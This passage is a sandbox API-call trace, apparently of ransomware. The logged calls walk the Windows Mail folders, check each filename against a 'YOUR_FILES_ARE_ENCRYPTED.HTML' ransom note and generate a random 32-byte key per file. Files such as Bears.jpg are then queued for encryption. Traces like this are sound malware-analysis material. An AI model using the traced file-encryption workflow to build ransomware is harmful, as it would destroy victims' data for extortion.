lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.725] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0170.725] lstrlenW (lpString=".jrs") returned 4 [0170.725] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0170.725] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcad8ca0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcad8ca0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x81f89e7e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0170.725] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\edbres00002.jrs") returned 73 [0170.725] lstrcmpW (lpString1="edbres00002.jrs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.725] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0170.725] lstrlenW (lpString=".jrs") returned 4 [0170.725] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0170.725] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcad8ca0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcad8ca0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859db9ea, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x60, cFileName="oeold.xml", cAlternateFileName="")) returned 1 [0170.725] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0170.725] lstrcmpW (lpString1="oeold.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.725] PathFindExtensionW (pszPath="oeold.xml") returned=".xml" [0170.725] lstrlenW (lpString=".xml") returned 4 [0170.725] PathFindExtensionW (pszPath="oeold.xml") returned=".xml" [0170.725] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0170.726] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=260) returned 1 [0170.726] CloseHandle (hObject=0x5b8) returned 1 [0170.726] 
FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcafee00, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0170.726] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned 68 [0170.726] GetProcessHeap () returned 0x270000 [0170.726] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0170.726] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" [0170.726] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*" [0170.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcafee00, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.728] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcafee00, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.728] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcad8ca0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcad8ca0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41e4d104, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0170.728] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0170.728] lstrcmpW (lpString1="Bears.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.728] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0170.729] lstrlenW (lpString=".htm") returned 4 [0170.729] PathFindExtensionW (pszPath="Bears.htm") returned=".htm" [0170.729] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0170.729] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=255) returned 1 [0170.729] CloseHandle (hObject=0x5cc) returned 1 [0170.729] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8267651c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0170.729] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0170.729] lstrcmpW (lpString1="Bears.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.729] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0170.729] lstrlenW (lpString=".jpg") returned 4 [0170.729] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0170.729] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0170.730] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1074) returned 1 [0170.730] GetProcessHeap () returned 0x270000 [0170.730] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78e9160 [0170.732] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="5A") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="2C") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="33") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="12") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="D1") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="47") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="DE") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="AF") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="A9") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="11") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="11") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A6") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="A2") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="9C") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="93") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="FD") returned 2 [0170.732] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="69") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="B8") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="3F") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="D6") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="BC") returned 2 
[0170.733] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="DB") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="66") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="BA") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="DF") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="85") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="09") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="54") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="01") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="8B") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="87") returned 2 [0170.733] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="2B") returned 2 [0170.733] lstrcpyW (in: lpString1=0x78f9214, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" [0170.734] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x78e9160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.734] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78e9160, lpOverlapped=0x78e9160) returned 1 [0170.734] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0xe21ca9ab, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0170.734] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0170.734] lstrcmpW (lpString1="Desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.734] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0170.734] lstrlenW (lpString=".ini") returned 4 [0170.734] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0170.734] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41e73264, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0170.734] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0170.734] lstrcmpW (lpString1="Garden.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.734] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0170.734] lstrlenW (lpString=".htm") returned 4 [0170.734] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0170.734] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: 
"c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0170.734] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=231) returned 1 [0170.734] CloseHandle (hObject=0x590) returned 1 [0170.735] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82780ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0170.735] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0170.735] lstrcmpW (lpString1="Garden.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.735] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0170.735] lstrlenW (lpString=".jpg") returned 4 [0170.735] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0170.735] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0170.735] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 
| out: lpFileSize=0x4ebd1f8*=23871) returned 1 [0170.735] GetProcessHeap () returned 0x270000 [0170.735] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8ef8 [0170.740] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="F3") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="61") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="2B") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="F0") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="53") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="69") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="58") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="04") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="50") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="1D") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="EF") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="8F") returned 2 [0170.740] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="D4") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="8C") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="F1") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="5A") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="C7") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="59") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="B6") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | 
out: param_1="1F") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="E0") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="F7") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="FC") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="33") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="8A") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7A") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="1C") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="FA") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="C7") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="E0") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="81") returned 2 [0170.741] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="34") returned 2 [0170.742] lstrcpyW (in: lpString1=0x76c8fac, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" [0170.742] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8ef8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.742] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8ef8, lpOverlapped=0x76b8ef8) returned 1 [0170.742] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41ebf524, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Green Bubbles.htm", cAlternateFileName="GREENB~1.HTM")) returned 1 [0170.742] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0170.742] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.742] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0170.742] lstrlenW (lpString=".htm") returned 4 [0170.742] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0170.742] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0170.742] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0170.742] CloseHandle (hObject=0x5dc) returned 1 [0170.743] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827cd17c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1906, 
dwReserved0=0x0, dwReserved1=0x0, cFileName="GreenBubbles.jpg", cAlternateFileName="GREENB~1.JPG")) returned 1 [0170.743] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0170.743] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.743] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0170.743] lstrlenW (lpString=".jpg") returned 4 [0170.743] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0170.743] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0170.743] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=6406) returned 1 [0170.743] GetProcessHeap () returned 0x270000 [0170.743] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e1050 [0170.745] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="5C") returned 2 [0170.745] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="F1") returned 2 [0170.745] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="05") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="3D") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="65") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="E2") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd12a, 
param_2="%02X" | out: param_1="C3") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="24") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="6F") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="D0") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="90") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="6D") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="B1") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="8C") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="4C") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="56") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="DB") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="19") returned 2 